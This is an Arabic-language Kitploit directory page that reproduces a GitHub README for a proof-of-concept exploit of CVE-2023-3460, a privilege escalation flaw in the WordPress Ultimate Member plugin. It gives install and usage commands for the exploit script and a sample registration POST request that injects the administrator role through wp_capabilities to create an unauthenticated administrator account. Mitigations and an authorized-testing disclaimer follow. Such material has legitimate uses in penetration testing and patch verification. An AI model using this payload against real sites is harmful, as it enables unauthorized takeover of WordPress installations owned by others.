Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-3460 — استغلال إثبات المفهوم لـ CVE-2023-3460، وهي ثغرة تصعيد الصلاحيات في إضافة WordPress Ultimate Member. ينشئ حساب مسؤول عبر طلب تسجيل مخصص. للاختبار المصرح به فقط. | Kitploit
أدوات/GitHubGitHub/gurjotexpert/cve-2023-3460
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubgurjotexpert/cve-2023-3460

CVE-2023-3460

استغلال إثبات المفهوم لـ CVE-2023-3460، وهي ثغرة تصعيد الصلاحيات في إضافة WordPress Ultimate Member. ينشئ حساب مسؤول عبر طلب تسجيل مخصص. للاختبار المصرح به فقط.

عرض المستودع
11منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚨 CVE-2023-3460 - استغلال تصعيد الصلاحيات في إضافة Ultimate Member لووردبريس

هذا استغلال إثبات المفهوم (PoC) لـ CVE-2023-3460، وهو ثغرة أمنية خطيرة في إضافة ووردبريس Ultimate Member. تسمح هذه الثغرة للمستخدمين غير المصادق عليهم بتصعيد صلاحياتهم إلى مدير عن طريق إنشاء طلب تسجيل خبيث.

🔥 التأثير: اختراق كامل للموقع من خلال إنشاء حساب مدير غير مصرح به.


📌 تفاصيل الثغرة

  • الإضافة المتأثرة: Ultimate Member
  • الإصدارات المتأثرة: ≤ 2.6.6
  • الإصدار المُصلح: 2.6.7
  • نوع الاستغلال: تصعيد الصلاحيات عبر إساءة استخدام التسجيل
  • المصادقة المطلوبة: ❌ لا
  • CVE: CVE-2023-3460

⚙️ المتطلبات

  • Python 3
  • مكتبة requests
  • مكتبة urllib3
  • مكتبة beautifulsoup4

تثبيت المتطلبات:

root@kitploit:~
pip3 install requests urllib3 beautifulsoup4

🧪 استخدام الاستغلال

root@kitploit:~
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD> 

✅ مثال:

root@kitploit:~
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123 

📥 ميزات سكريبت الاستغلال

  • يجلب رمز CSRF (_wpnonce) من صفحة التسجيل
  • يتجاوز التحقق من صحة النموذج
  • يحقن wp_capabilities مع دور administrator
  • ينشئ مستخدم مدير جديد بدون مصادقة

🔐 نموذج حمولة الاستغلال

root@kitploit:~
POST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded

user_login=pwnadmin&
[email protected]&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>

🛡️ التخفيف

  • تحديث إضافة Ultimate Member إلى v2.6.7 أو أعلى
  • تعطيل التسجيل المفتوح إذا لم يكن مطلوبًا
  • مراقبة سجلات إنشاء المستخدمين بحثًا عن نشاط مشبوه

📚 المراجع

  • 🔗 استشارة Patchstack
  • 🔗 CVE-2023-3460 على NVD

⚠️ إخلاء مسؤولية

تم توفير هذا السكريبت لأغراض تعليمية واختبار مصرح به فقط. الاستغلال غير المصرح به للأنظمة غير قانوني وغير أخلاقي. استخدمه فقط على الأنظمة التي تملكها أو لديك إذن لاختبارها.


👨‍💻 المؤلف

  • 💀 [GURJOT SINGH]
  • 🔒 [LinkedIn: https://in.linkedin.com/in/gurjot-singh-8198b3220]
تنزيل الأداة